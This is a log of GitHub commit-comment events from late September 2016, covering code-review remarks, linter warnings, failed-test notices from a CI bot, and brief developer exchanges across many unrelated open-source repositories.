{"id":"4646016215","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248680,"position":20,"line":null,"path":"src/Parsers/Csv.php","commit_id":"06a4444cda38713d502073ea6d910f7a97174907","created_at":"2016-09-30T21:43:52Z","updated_at":"2016-09-30T21:43:52Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-30T21:43:52Z"}
{"id":"4646016287","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248681,"position":21,"line":null,"path":"src/Parsers/Csv.php","commit_id":"06a4444cda38713d502073ea6d910f7a97174907","created_at":"2016-09-30T21:43:53Z","updated_at":"2016-09-30T21:43:53Z","body":"PHPCS: Expected 1 space after IF keyword; 0 found"}},"created_at":"2016-09-30T21:43:53Z"}
{"id":"4646017599","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248685,"position":3,"line":null,"path":"src/Parsers/Csv.php","commit_id":"202c4ef95063e7d5edda730ebc513102444ee367","created_at":"2016-09-30T21:44:12Z","updated_at":"2016-09-30T21:44:12Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-30T21:44:12Z"}
{"id":"4646018264","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248688,"position":3,"line":null,"path":"src/Parsers/Csv.php","commit_id":"2ae8fbf5849ea084076d3247ffc306930c3989ca","created_at":"2016-09-30T21:44:22Z","updated_at":"2016-09-30T21:44:22Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-30T21:44:22Z"}
{"id":"4646018708","type":"CommitCommentEvent","actor":{"login":"crutchcorn"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":19248691,"position":null,"line":null,"path":null,"commit_id":"df55970c61af7d1cfc0292aa7ca68a5f96c0c888","created_at":"2016-09-30T21:44:28Z","updated_at":"2016-09-30T21:44:28Z","body":"so hardcoar"}},"created_at":"2016-09-30T21:44:28Z"}
{"id":"4646018733","type":"CommitCommentEvent","actor":{"login":"javelinanddart"},"repo":{"name":"CyanogenMod/android_device_samsung_jf-common"},"payload":{"comment":{"id":19248692,"position":null,"line":null,"path":null,"commit_id":"c6fc19f97a6bacaa67e2cbb3b80da8802dde3cd7","created_at":"2016-09-30T21:44:28Z","updated_at":"2016-09-30T21:44:28Z","body":"@zwliew Shouldn't we remove rmt_storage stuff from init because we no longer have that blob?"}},"created_at":"2016-09-30T21:44:28Z"}
{"id":"4646018906","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248694,"position":20,"line":null,"path":"src/Parsers/Csv.php","commit_id":"6fa759bba3bb13ebc11d73ade1bf1622886ed8e8","created_at":"2016-09-30T21:44:31Z","updated_at":"2016-09-30T21:44:31Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-30T21:44:31Z"}
{"id":"4646020206","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248697,"position":3,"line":null,"path":"src/Parsers/Csv.php","commit_id":"04651140e7146f489e57af7427b4fee70a552e34","created_at":"2016-09-30T21:44:50Z","updated_at":"2016-09-30T21:44:50Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-30T21:44:50Z"}
{"id":"4646027326","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"OVERdrive-IRC/thelounge"},"payload":{"comment":{"id":19248713,"position":null,"line":null,"path":null,"commit_id":"775dc2793f654035c287abb81473f26e3124db1b","created_at":"2016-09-30T21:46:34Z","updated_at":"2016-09-30T21:46:34Z","body":"There's also `helpop`, `logon`, `idle` which can be displayed. https://github.com/kiwiirc/irc-framework/blob/867b5670e2f73fe2095e10d61522e91726de394c/src/commands/handlers/user.js\r\n\r\nAre you going to make a PR with this later?"}},"created_at":"2016-09-30T21:46:34Z"}
{"id":"4646033987","type":"CommitCommentEvent","actor":{"login":"gericklee"},"repo":{"name":"gericklee/psychophysics"},"payload":{"comment":{"id":19248728,"position":null,"line":null,"path":null,"commit_id":"5ee0b8b1a5c814cf952e7d22fef7268300de3a54","created_at":"2016-09-30T21:48:08Z","updated_at":"2016-09-30T21:48:08Z","body":"This was a big shift - made everything through Weibull fitting support monocular data (and no longer binocular).  Older versions will support binocular."}},"created_at":"2016-09-30T21:48:08Z"}
{"id":"4646037281","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19248737,"position":null,"line":null,"path":null,"commit_id":"687e8edbf45d5af7936cfbcb4f42dad13afb6c59","created_at":"2016-09-30T21:48:50Z","updated_at":"2016-09-30T21:48:50Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36443/testReport/) for this commit**"}},"created_at":"2016-09-30T21:48:50Z"}
{"id":"4646037282","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19248738,"position":null,"line":null,"path":null,"commit_id":"4f88c944b0e45784ef73936858dfa3717a886827","created_at":"2016-09-30T21:48:50Z","updated_at":"2016-09-30T21:48:50Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36445/testReport/) for this commit**"}},"created_at":"2016-09-30T21:48:50Z"}
{"id":"4646039608","type":"CommitCommentEvent","actor":{"login":"Moodiment"},"repo":{"name":"Moodiment/PantryPros"},"payload":{"comment":{"id":19248749,"position":null,"line":null,"path":null,"commit_id":"28c59099edfec229be08b1009cff394f12cf94f6","created_at":"2016-09-30T21:49:20Z","updated_at":"2016-09-30T21:49:20Z","body":"Haven't heard anything from Brian Kidd"}},"created_at":"2016-09-30T21:49:20Z"}
{"id":"4646045280","type":"CommitCommentEvent","actor":{"login":"sjackman"},"repo":{"name":"GFA-spec/GFA-spec"},"payload":{"comment":{"id":19248758,"position":37,"line":180,"path":"GFA2-spec.md","commit_id":"6bd0a3b15f3bac7d94e0bce09d47ed0a9a80939a","created_at":"2016-09-30T21:50:42Z","updated_at":"2016-09-30T21:50:42Z","body":"Can we please use `*` if the variance is unknown? That's more consistent with `*` indicating missing information.\r\nIf variance is an integer field, then computed variance in the range of [0, 0.5) will be rounded down to 0. `0` should indicate little variance, not missing information."}},"created_at":"2016-09-30T21:50:42Z"}
{"id":"4646045698","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19248763,"position":null,"line":null,"path":null,"commit_id":"f5381cc64ba416f617fb3572515ace4b50adb570","created_at":"2016-09-30T21:50:47Z","updated_at":"2016-09-30T21:50:47Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36446/testReport/) for this commit**"}},"created_at":"2016-09-30T21:50:47Z"}
{"id":"4646046011","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19248767,"position":null,"line":null,"path":null,"commit_id":"687e8edbf45d5af7936cfbcb4f42dad13afb6c59","created_at":"2016-09-30T21:50:51Z","updated_at":"2016-09-30T21:50:51Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36447/testReport/) for this commit**"}},"created_at":"2016-09-30T21:50:51Z"}
{"id":"4646049841","type":"CommitCommentEvent","actor":{"login":"sehraf"},"repo":{"name":"RetroShare/documentation"},"payload":{"comment":{"id":19248773,"position":38,"line":38,"path":"docs/user-guide/plugins.md","commit_id":"b55dd3829fb827fdc52ccf8ebed9761739527e17","created_at":"2016-09-30T21:51:41Z","updated_at":"2016-09-30T21:51:41Z","body":"it also works with 0.6.1 😉 \r\nalso i would say it's maintained - i do not develop it actively anymore"}},"created_at":"2016-09-30T21:51:41Z"}
{"id":"4646050071","type":"CommitCommentEvent","actor":{"login":"troySteveHUNT"},"repo":{"name":"oiosaway/Resume"},"payload":{"comment":{"id":19248775,"position":1,"line":1,"path":"README.md","commit_id":"cf7f9677be79768c60ab1b3e32e031de6b7c2e4a","created_at":"2016-09-30T21:51:44Z","updated_at":"2016-09-30T21:51:44Z","body":"Lol "}},"created_at":"2016-09-30T21:51:44Z"}
{"id":"4646052290","type":"CommitCommentEvent","actor":{"login":"owenson"},"repo":{"name":"olucurious/PyFCM"},"payload":{"comment":{"id":19248779,"position":null,"line":null,"path":null,"commit_id":"39373be8a198120e26e128054ec4ec58846e0988","created_at":"2016-09-30T21:52:14Z","updated_at":"2016-09-30T21:52:14Z","body":"thanks!"}},"created_at":"2016-09-30T21:52:14Z"}
{"id":"4646056284","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19248790,"position":null,"line":null,"path":null,"commit_id":"d79d182ca58980a42825ebc33658e88a8b127fe7","created_at":"2016-09-30T21:53:14Z","updated_at":"2016-09-30T21:53:14Z","body":"is there going to be a dedicated server?"}},"created_at":"2016-09-30T21:53:14Z"}
{"id":"4646062513","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19248800,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-30T21:54:47Z","updated_at":"2016-09-30T21:54:47Z","body":"I just provided a fix in bookdown so you will be able to use any characters in the caption: https://github.com/rstudio/bookdown/issues/209"}},"created_at":"2016-09-30T21:54:47Z"}
{"id":"4646064251","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19248809,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-30T21:55:14Z","updated_at":"2016-09-30T21:55:14Z","body":"That's awesome! I will check it out!\n\n________________________________\nFrom: Yihui Xie <notifications@github.com>\nSent: Friday, September 30, 2016 3:54:47 PM\nTo: geanders/RProgrammingForResearch\nCc: Anderson,Brooke; Author\nSubject: Re: [geanders/RProgrammingForResearch] Try without backticks in the nepaliscatter1 caption... (e2e5479)\n\n\nI just provided a fix in bookdown so you will be able to use any characters in the caption: rstudio/bookdown#209<https://github.com/rstudio/bookdown/issues/209>\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/geanders/RProgrammingForResearch/commit/e2e547931a51fd2b3df4aca4d32148e287e9520d#commitcomment-19248800>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AFVFiIpP9g8S-QEylM-x910aHN9b58_Tks5qvYUngaJpZM4KFhgz>.\n"}},"created_at":"2016-09-30T21:55:14Z"}
{"id":"4646066791","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19248813,"position":null,"line":null,"path":null,"commit_id":"1862bb570905076f41f29bd822aeea27c5c7a838","created_at":"2016-09-30T21:55:54Z","updated_at":"2016-09-30T21:55:54Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36448/testReport/) for this commit**"}},"created_at":"2016-09-30T21:55:54Z"}
{"id":"4646068966","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19248816,"position":null,"line":null,"path":null,"commit_id":"ecd023b33d8ab5a852420188ca4eae603776937c","created_at":"2016-09-30T21:56:26Z","updated_at":"2016-09-30T21:56:26Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36449/testReport/) for this commit**"}},"created_at":"2016-09-30T21:56:26Z"}
{"id":"4646070810","type":"CommitCommentEvent","actor":{"login":"firemark"},"repo":{"name":"hackerspace-silesia/hs_scripts"},"payload":{"comment":{"id":19248819,"position":93,"line":93,"path":"mail_meetings/hs_wiki.py","commit_id":"bb10bcf6004ca52de67b0940ef06a86431ea4e52","created_at":"2016-09-30T21:56:55Z","updated_at":"2016-09-30T21:56:55Z","body":"Myślę, że chodzi o to, że jak skrypt ma być bardziej ogólny, powinnien mieć możliwość zmiany serwera - tu ma rację.\r\nTylko po co jeżeli skrypt miał być w założeniu tylko dla nas :) Zwłaszcza, że scrapuje dokładnie nasz format strony z wiki."}},"created_at":"2016-09-30T21:56:55Z"}
{"id":"4646072961","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19248827,"position":null,"line":null,"path":null,"commit_id":"497448d8f877a71fe85bf2b9f5c693defdd55b9a","created_at":"2016-09-30T21:57:29Z","updated_at":"2016-09-30T21:57:29Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36450/testReport/) for this commit**"}},"created_at":"2016-09-30T21:57:29Z"}
{"id":"4646074498","type":"CommitCommentEvent","actor":{"login":"IgorNat"},"repo":{"name":"IgorNat/hello_word"},"payload":{"comment":{"id":19248833,"position":null,"line":null,"path":null,"commit_id":"e1511ea80f1a57394e39d921c629b43aa13c7672","created_at":"2016-09-30T21:57:52Z","updated_at":"2016-09-30T21:57:52Z","body":"Sub 2 editing"}},"created_at":"2016-09-30T21:57:52Z"}
{"id":"4646075397","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19248834,"position":null,"line":null,"path":null,"commit_id":"176103c23a2eeaf710b15d7e42c8f8784300fabd","created_at":"2016-09-30T21:58:05Z","updated_at":"2016-09-30T21:58:05Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36451/testReport/) for this commit**"}},"created_at":"2016-09-30T21:58:05Z"}
{"id":"4646077335","type":"CommitCommentEvent","actor":{"login":"troySteveHUNT"},"repo":{"name":"troySteveHUNT/untrusted"},"payload":{"comment":{"id":19248837,"position":null,"line":null,"path":null,"commit_id":"733e2e3801eae7908c9256b4c672d537186abd27","created_at":"2016-09-30T21:58:34Z","updated_at":"2016-09-30T21:58:34Z","body":"#http://www.unicode.org/reports/tr9/"}},"created_at":"2016-09-30T21:58:34Z"}
{"id":"4646096128","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19248884,"position":null,"line":null,"path":null,"commit_id":"f60145d8e491dc1e9bd343d02279b340943e2f48","created_at":"2016-09-30T22:03:14Z","updated_at":"2016-09-30T22:03:14Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Z4jr6M-rQeiQ3xQAQO6XNA"}},"created_at":"2016-09-30T22:03:14Z"}
{"id":"4646096152","type":"CommitCommentEvent","actor":{"login":"zosinski"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19248885,"position":38,"line":35,"path":"js/script.js","commit_id":"52f7db694aaea040c4fc1a308bd086f3ef02a5fc","created_at":"2016-09-30T22:03:15Z","updated_at":"2016-09-30T22:03:15Z","body":"ok, ja tylko naśladuję przykłady z Kodilli.. :) poprawiam"}},"created_at":"2016-09-30T22:03:15Z"}
{"id":"4646100788","type":"CommitCommentEvent","actor":{"login":"anilanar"},"repo":{"name":"facebook/jest"},"payload":{"comment":{"id":19248894,"position":6,"line":41,"path":"packages/jest-diff/src/index.js","commit_id":"fed449c226904e06ab7fce73cd9737e16d505cfb","created_at":"2016-09-30T22:04:29Z","updated_at":"2016-09-30T22:04:29Z","body":"@cpojer is this if condition needed? I tried removing it and calling `diffStrings` for one-liners and it at least displays a diff instead of printing null: \r\n\r\n<img width=\"443\" alt=\"screen shot 2016-10-01 at 00 03 29\" src=\"https://cloud.githubusercontent.com/assets/753736/19008289/838a0ca2-876a-11e6-9630-9b7c1dd3e47d.png\">\r\n\r\nThis is certainly more useful than printing null, until one-liner diffs are fixed.\r\n "}},"created_at":"2016-09-30T22:04:29Z"}
{"id":"4646104396","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":19248901,"position":null,"line":null,"path":null,"commit_id":"7add23f314262c1f65582c031ebe7c1d2a33fd07","created_at":"2016-09-30T22:05:28Z","updated_at":"2016-09-30T22:05:28Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [#16 (5) Add `elevation` mixin](https://trello.com/c/lToM9dX8/1-16-5-add-elevation-mixin)"}},"created_at":"2016-09-30T22:05:28Z"}
{"id":"4646113126","type":"CommitCommentEvent","actor":{"login":"raphaellondner-okta"},"repo":{"name":"jmelberg/okta-oidc-django-samples"},"payload":{"comment":{"id":19248928,"position":14,"line":14,"path":"README.md","commit_id":"b2ac8aa282a456b620451d9830be56893c893afa","created_at":"2016-09-30T22:07:48Z","updated_at":"2016-09-30T22:07:48Z","body":"I'm a bit reluctant at recommending \"Native\" here as it will affect downstream analytics."}},"created_at":"2016-09-30T22:07:48Z"}
{"id":"4646115001","type":"CommitCommentEvent","actor":{"login":"Mohsennady"},"repo":{"name":"Mohsennady/datasciencecoursera"},"payload":{"comment":{"id":19248935,"position":null,"line":null,"path":null,"commit_id":"7cc71f845ab1ec69ebd46c2690a8e5c8ee6dc69a","created_at":"2016-09-30T22:08:14Z","updated_at":"2016-09-30T22:08:14Z","body":"## This is a markdown file\r\n"}},"created_at":"2016-09-30T22:08:14Z"}
{"id":"4646116241","type":"CommitCommentEvent","actor":{"login":"PieterjanVerhelst"},"repo":{"name":"PieterjanVerhelst/resident-eel-polder-analysis"},"payload":{"comment":{"id":19248940,"position":38,"line":38,"path":"src/Creeks_dataH_analysis.R","commit_id":"3c9cda45a0d31e1466910a14a01ee825f962a2cd","created_at":"2016-09-30T22:08:35Z","updated_at":"2016-09-30T22:08:35Z","body":"Indeed. In the beginning I had some problems with setting date-time in the correct format and searched for different methods. Apparently I let the 2 methods (strptime() and as.POSIXct()) active in the script."}},"created_at":"2016-09-30T22:08:35Z"}
{"id":"4646116509","type":"CommitCommentEvent","actor":{"login":"raphaellondner-okta"},"repo":{"name":"jmelberg/okta-oidc-django-samples"},"payload":{"comment":{"id":19248941,"position":20,"line":20,"path":"README.md","commit_id":"b2ac8aa282a456b620451d9830be56893c893afa","created_at":"2016-09-30T22:08:39Z","updated_at":"2016-09-30T22:08:39Z","body":"Needs additional info to explicitly mention that http://localhost:8080 should be added as a CORS endpoint."}},"created_at":"2016-09-30T22:08:39Z"}
{"id":"4646120778","type":"CommitCommentEvent","actor":{"login":"raphaellondner-okta"},"repo":{"name":"jmelberg/okta-oidc-django-samples"},"payload":{"comment":{"id":19248960,"position":29,"line":29,"path":"README.md","commit_id":"b2ac8aa282a456b620451d9830be56893c893afa","created_at":"2016-09-30T22:09:47Z","updated_at":"2016-09-30T22:09:47Z","body":"Can we come up with corresponding instructions for Windows maybe?"}},"created_at":"2016-09-30T22:09:47Z"}
{"id":"4646121950","type":"CommitCommentEvent","actor":{"login":"raphaellondner-okta"},"repo":{"name":"jmelberg/okta-oidc-django-samples"},"payload":{"comment":{"id":19248964,"position":24,"line":24,"path":"README.md","commit_id":"b2ac8aa282a456b620451d9830be56893c893afa","created_at":"2016-09-30T22:10:08Z","updated_at":"2016-09-30T22:10:08Z","body":"Please spell \"OS X\", not \"OSX\"."}},"created_at":"2016-09-30T22:10:08Z"}
{"id":"4646122413","type":"CommitCommentEvent","actor":{"login":"zyxue"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19248965,"position":20,"line":37,"path":"src/PinyinCushionEditor.js","commit_id":"ab93076f98fc441f458ba94c2b053ecfdb1a1c28","created_at":"2016-09-30T22:10:14Z","updated_at":"2016-09-30T22:10:14Z","body":"The database will need to be updated, too. Currently only the top 5000 characters (5000 traditional + 5000 simplified) are included. Pay attention to its size increase."}},"created_at":"2016-09-30T22:10:14Z"}
{"id":"4646131099","type":"CommitCommentEvent","actor":{"login":"PieterjanVerhelst"},"repo":{"name":"PieterjanVerhelst/resident-eel-polder-analysis"},"payload":{"comment":{"id":19248987,"position":43,"line":43,"path":"src/Creeks_dataH_analysis.R","commit_id":"3c9cda45a0d31e1466910a14a01ee825f962a2cd","created_at":"2016-09-30T22:12:32Z","updated_at":"2016-09-30T22:12:32Z","body":"There is no difference. In the script that calculates the swim distance and swim speed, the collumn  Arrival is converted into Arrival_time.\r\nA better option would be to just convert it, without creating a new column. However, this is in another script.\r\nFor this data analysis, we can remove the column Arrival from the dataset.\r\n"}},"created_at":"2016-09-30T22:12:32Z"}
{"id":"4646137185","type":"CommitCommentEvent","actor":{"login":"X123M3-256"},"repo":{"name":"X123M3-256/X123M3-256.github.io"},"payload":{"comment":{"id":19249002,"position":null,"line":null,"path":null,"commit_id":"38c5cfc39b38a387250e7002b1e5cfbe498b8230","created_at":"2016-09-30T22:14:14Z","updated_at":"2016-09-30T22:14:14Z","body":"Yeah, I've been meaning to get those uploaded somewhere. I've got the Blender files, the OBJ files as exported from Blender, and the final JSON files generated by my program.\r\n\r\nI will probably upload all three in a zipped folder (and try to fix any JSON that no longer loads in the latest version). That will take some time to prepare, so I'll do it tomorrow."}},"created_at":"2016-09-30T22:14:14Z"}
{"id":"4646143691","type":"CommitCommentEvent","actor":{"login":"PieterjanVerhelst"},"repo":{"name":"PieterjanVerhelst/resident-eel-polder-analysis"},"payload":{"comment":{"id":19249021,"position":44,"line":44,"path":"src/Creeks_dataH_analysis.R","commit_id":"3c9cda45a0d31e1466910a14a01ee825f962a2cd","created_at":"2016-09-30T22:16:01Z","updated_at":"2016-09-30T22:16:01Z","body":"I agree, Arrival_month and Arrival_year can add more clarification to the reader.\r\nWhen using the function year(), the day is given in the newly created column.\r\n"}},"created_at":"2016-09-30T22:16:01Z"}
{"id":"4646148166","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19249033,"position":null,"line":null,"path":null,"commit_id":"801115d7a441e751d59d33e91cc26d2ff0203976","created_at":"2016-09-30T22:17:16Z","updated_at":"2016-09-30T22:17:16Z","body":"Such homestar going on in here"}},"created_at":"2016-09-30T22:17:16Z"}
{"id":"4646151678","type":"CommitCommentEvent","actor":{"login":"wowselim"},"repo":{"name":"wowselim/gscrot"},"payload":{"comment":{"id":19249047,"position":null,"line":null,"path":null,"commit_id":"5cc42f4fd36e2eee709ec624b0b8621bfb3d54cd","created_at":"2016-09-30T22:18:17Z","updated_at":"2016-09-30T22:18:17Z","body":"Check whether the Desktop class is supported or not first."}},"created_at":"2016-09-30T22:18:17Z"}
{"id":"4646152553","type":"CommitCommentEvent","actor":{"login":"bsclifton"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19249049,"position":null,"line":null,"path":null,"commit_id":"0b3663f2fd6b9fda274eb6f7c56b8b4dd3283838","created_at":"2016-09-30T22:18:33Z","updated_at":"2016-09-30T22:18:33Z","body":":+1: "}},"created_at":"2016-09-30T22:18:33Z"}
{"id":"4646154080","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249052,"position":5,"line":18,"path":"language-project/dao/src/main/java/com/language/dao/CourseDao.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:18:58Z","updated_at":"2016-09-30T22:18:58Z","body":"можно слово Language убрать из названия"}},"created_at":"2016-09-30T22:18:58Z"}
{"id":"4646154640","type":"CommitCommentEvent","actor":{"login":"zavan"},"repo":{"name":"konsento/konsento"},"payload":{"comment":{"id":19249053,"position":null,"line":null,"path":null,"commit_id":"6304f18235e270ba10d212767ad8fe6b8212d6ac","created_at":"2016-09-30T22:19:08Z","updated_at":"2016-09-30T22:19:08Z","body":"closes #43 "}},"created_at":"2016-09-30T22:19:08Z"}
{"id":"4646156269","type":"CommitCommentEvent","actor":{"login":"301githubting8"},"repo":{"name":"CMPUT301F16T14/Project"},"payload":{"comment":{"id":19249062,"position":null,"line":null,"path":null,"commit_id":"1bb0bb040bf5d5debb1cc5be1f7be877a9df1e2e","created_at":"2016-09-30T22:19:36Z","updated_at":"2016-09-30T22:19:36Z","body":"Hello"}},"created_at":"2016-09-30T22:19:36Z"}
{"id":"4646157684","type":"CommitCommentEvent","actor":{"login":"raphaellondner-okta"},"repo":{"name":"jmelberg/okta-oidc-django-samples"},"payload":{"comment":{"id":19249068,"position":32,"line":32,"path":"README.md","commit_id":"b2ac8aa282a456b620451d9830be56893c893afa","created_at":"2016-09-30T22:19:59Z","updated_at":"2016-09-30T22:19:59Z","body":"Should be clear that we must run this from the **oauth2** sub-folder since the previous virtualenv/pip commands are run from the repo root (which you don't clearly mention either, but it's pretty obvious)"}},"created_at":"2016-09-30T22:19:59Z"}
{"id":"4646158267","type":"CommitCommentEvent","actor":{"login":"cowtowncoder"},"repo":{"name":"FasterXML/jackson-core"},"payload":{"comment":{"id":19249070,"position":18,"line":407,"path":"src/main/java/com/fasterxml/jackson/core/JsonPointer.java","commit_id":"06f401cb78800734ea510293f3d83d66636d133a","created_at":"2016-09-30T22:20:09Z","updated_at":"2016-09-30T22:20:09Z","body":"Yes, indeed. Can't believe I not only fat-fingered but didn't re-compile...\r\n"}},"created_at":"2016-09-30T22:20:09Z"}
{"id":"4646158611","type":"CommitCommentEvent","actor":{"login":"CrackerTeg"},"repo":{"name":"BrokenROM/external_stagefright-plugins"},"payload":{"comment":{"id":19249071,"position":null,"line":null,"path":null,"commit_id":"40998aa023a37f1dc7d20c8963c294af4f09353b","created_at":"2016-09-30T22:20:14Z","updated_at":"2016-09-30T22:20:14Z","body":"Nope"}},"created_at":"2016-09-30T22:20:14Z"}
{"id":"4646159923","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":19249078,"position":14,"line":87,"path":"FHEM/00_SIGNALduino.pm","commit_id":"4aaac4b0b84d3e50b68e63524d3c6948c4b613f5","created_at":"2016-09-30T22:20:37Z","updated_at":"2016-09-30T22:20:37Z","body":"mit nur einem : wird bei mir bei der clients Anzeige kein Zeilenumbruch zugefügt.\r\nEs funktioniert mit dem Zeilenumbruch nur bei Leerzeichen und :"}},"created_at":"2016-09-30T22:20:37Z"}
{"id":"4646178359","type":"CommitCommentEvent","actor":{"login":"raphaellondner-okta"},"repo":{"name":"jmelberg/okta-oidc-django-samples"},"payload":{"comment":{"id":19249107,"position":37,"line":37,"path":"README.md","commit_id":"b2ac8aa282a456b620451d9830be56893c893afa","created_at":"2016-09-30T22:25:44Z","updated_at":"2016-09-30T22:25:44Z","body":"Should we add pointers to your 3 sub-sample readme files for specific Okta org configuration steps?"}},"created_at":"2016-09-30T22:25:44Z"}
{"id":"4646179444","type":"CommitCommentEvent","actor":{"login":"InkSlinger666"},"repo":{"name":"BrokenROM/external_stagefright-plugins"},"payload":{"comment":{"id":19249111,"position":null,"line":null,"path":null,"commit_id":"40998aa023a37f1dc7d20c8963c294af4f09353b","created_at":"2016-09-30T22:26:02Z","updated_at":"2016-09-30T22:26:02Z","body":"Guess ole boy missed the \"Can't use this without a Dolby(TM) license for DD(TM) and DDP(TM)\" cause it was commented out, and if the compiler cant read it, seems he cant either"}},"created_at":"2016-09-30T22:26:02Z"}
{"id":"4646180186","type":"CommitCommentEvent","actor":{"login":"raphaellondner-okta"},"repo":{"name":"jmelberg/okta-oidc-django-samples"},"payload":{"comment":{"id":19249117,"position":18,"line":18,"path":"README.md","commit_id":"b2ac8aa282a456b620451d9830be56893c893afa","created_at":"2016-09-30T22:26:14Z","updated_at":"2016-09-30T22:26:14Z","body":"Where do we address the client configuration steps?"}},"created_at":"2016-09-30T22:26:14Z"}
{"id":"4646182331","type":"CommitCommentEvent","actor":{"login":"Stanback"},"repo":{"name":"kriasoft/isomorphic-style-loader"},"payload":{"comment":{"id":19249122,"position":null,"line":null,"path":null,"commit_id":"3d3bc7015bcb5fa542df53fbcfe6033e8ed98dd1","created_at":"2016-09-30T22:26:47Z","updated_at":"2016-09-30T22:26:47Z","body":"Thank you, just what I was looking for 👍 "}},"created_at":"2016-09-30T22:26:47Z"}
{"id":"4646182395","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249123,"position":36,"line":36,"path":"language-project/web/src/main/java/com/content/servlet/DictionaryController.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:26:48Z","updated_at":"2016-09-30T22:26:48Z","body":"лучше выбрать более информативное имя для переменной. Например userDictionaryDao"}},"created_at":"2016-09-30T22:26:48Z"}
{"id":"4646183244","type":"CommitCommentEvent","actor":{"login":"aschwaighofer"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19249129,"position":null,"line":null,"path":null,"commit_id":"d3ef6f70f2c1795c55602f36362542366af5674e","created_at":"2016-09-30T22:27:04Z","updated_at":"2016-09-30T22:27:04Z","body":"I have tried to construct a test case based on the radar that should blow up.\r\n\r\nhttps://github.com/aschwaighofer/swift/tree/test_case_for_rdar_28203571\r\n\r\nI have not yet been able to find out why the test case i created is not blowing up."}},"created_at":"2016-09-30T22:27:04Z"}
